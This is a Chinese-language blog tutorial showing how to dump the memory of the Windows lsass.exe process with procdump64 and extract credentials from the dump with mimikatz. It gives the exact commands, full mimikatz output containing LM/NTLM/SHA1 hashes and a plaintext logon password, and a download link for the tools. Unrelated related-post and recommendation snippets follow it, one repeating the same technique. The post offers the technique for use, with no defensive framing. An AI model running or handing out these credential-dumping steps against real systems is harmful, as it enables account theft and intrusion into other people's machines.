使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump files

Copyright (C) 2009-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp

[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.

[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds

[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 137821 (00000000:00021a5d)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-19

	msv :

	tspkg :

	wdigest :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	kerberos :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)

Session           : Service from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-20

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 48630 (00000000:0000bdf6)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:06

SID               :

	msv :

	tspkg :

	wdigest :

	kerberos :

	ssp :

	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:05

SID               : S-1-5-18

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

mimikatz(commandline) # exit

Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

两步完成利用procdump64+mimikatz获取win用户密码的更多相关文章

  1. procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sek ...

  2. 微信公众平台开发—利用OAuth2.0获取微信用户基本信息

    在借鉴前两篇获取微信用户基本信息的基础下,本人也总结整理了一些个人笔记:如何通过OAuth2.0获取微信用户信息 1.首先在某微信平台下配置OAuth2.0授权回调页面: 2.通过appid构造url ...

  3. SpringBoot中获取微信用户信息从未如此简单!

    前言 不知道你是否参加过拼多多上邀请微信好友砍价功能,这个功能实现首先需要考虑的就是获取微信用户的信息.获取用户信息就是获取公众号下微信用户的信息,今天我就来讲讲如何从公众号下获取微信用户信息. 需要 ...

  4. 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)

    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...

  5. Android 两步搞定Fragment的返回键

    Fragment可以说是在Android开发必需要使用到技术,项目中的界面基本上都是使用Fragment来实现,而Activity只是作为Fragment的载体,但有些特殊情况下Fragment也不得 ...

  6. Kubernetes 两步验证 - 使用 Serverless 实现动态准入控制

    作者:CODING - 王炜 1. 背景 如果对 Kubernetes 集群安全特别关注,那么我们可能想要实现这些需求: 如何实现 Kubernetes 集群的两步验证,除了集群凭据,还需要提供一次性 ...

  7. 七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?

    一般情况下,点账户名——账户设置——安全设置,即可开通两步验证 具体步骤见链接  七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?   二次验证码小程序(官网)对比谷歌身份验证器APP ...

  8. 挑子学习笔记:两步聚类算法(TwoStep Cluster Algorithm)——改进的BIRCH算法

    转载请标明出处:http://www.cnblogs.com/tiaozistudy/p/twostep_cluster_algorithm.html 两步聚类算法是在SPSS Modeler中使用的 ...

  9. 每次Xcode 升级之后 插件失效,两步解决

    以下内容来源:http://www.cocoachina.com/bbs/read.php?tid=296269 每次Xcode 升级之后 插件失效,两步解决 1.打开终端,输入以下代码获取到DVTP ...

随机推荐

  1. [xdoj]1299&1300朱神的烦恼 朱神的序列

    http://acm.xidian.edu.cn/problem.php?id=1299 1.第一道题简单的很,数据范围最多只有1e4,对于数组中的每一个元素进行两个for循环,i=0;i<n; ...

  2. iOS UI进阶-5.0 蓝牙/加速计/传感器

    传感器 实现代码: #import "ViewController.h" @interface ViewController () @end @implementation Vie ...

  3. Cocos Creator 获得设备分辨率

    var b = cc.director.getWinSizeInPixels() var bx = b.width var by = b.height

  4. Oracle中找出用户的上次登录时间

    可以使用如下sql语句: select t1.username,t1.logon_time last_logon_time,t2.account_status,created 账号创建时间 from ...

  5. caffe中通过prototxt文件查看神经网络模型结构的方法

    在修改propotxt之前我们可以对之前的网络结构进行一个直观的认识: 可以使用http://ethereon.github.io/netscope/#/editor 这个网址. 将propotxt文 ...

  6. tcl脚本

    tcl,全名tool command language,是一种通用的工具语言. 1)每个命令之间,通过换行符或者分号隔开: 2)tcl的每个命令包含一个或者多个单词,默认第一个单词表示命令,第二个单词 ...

  7. windows假装更新升级

    http://fakeupdate.net/ 进入这个网站,选择一款系统界面,按F11进去全屏 比较有趣

  8. sitecore系统教程之限制对客户端的访问

    如果您为不同目的配置服务器,根据角色,您可能需要禁用Sitecore客户端.例如,如果配置内容交付服务器或处理服务器,则无需访问客户端应用程序,因此在这种情况下,建议禁用客户端. 为防止未经授权访问S ...

  9. 【转】SQL Server 运行状况监控SQL语句

    SQL Server 运行状况监控SQL语句   Microsoft SQL Server 2005 提供了一些工具来监控数据库.方法之一是动态管理视图.动态管理视图 (DMV) 和动态管理函数 (D ...

  10. codeoforces 932A

    题意: A和B在玩一个游戏,首先有一个X0 >= 3,之后选择一个小于X0的质数p,然后在找一个最小的X1 >= X0,并且p可以整除X1:之后再选择一个小于X1的质数p,然后再找一个最小 ...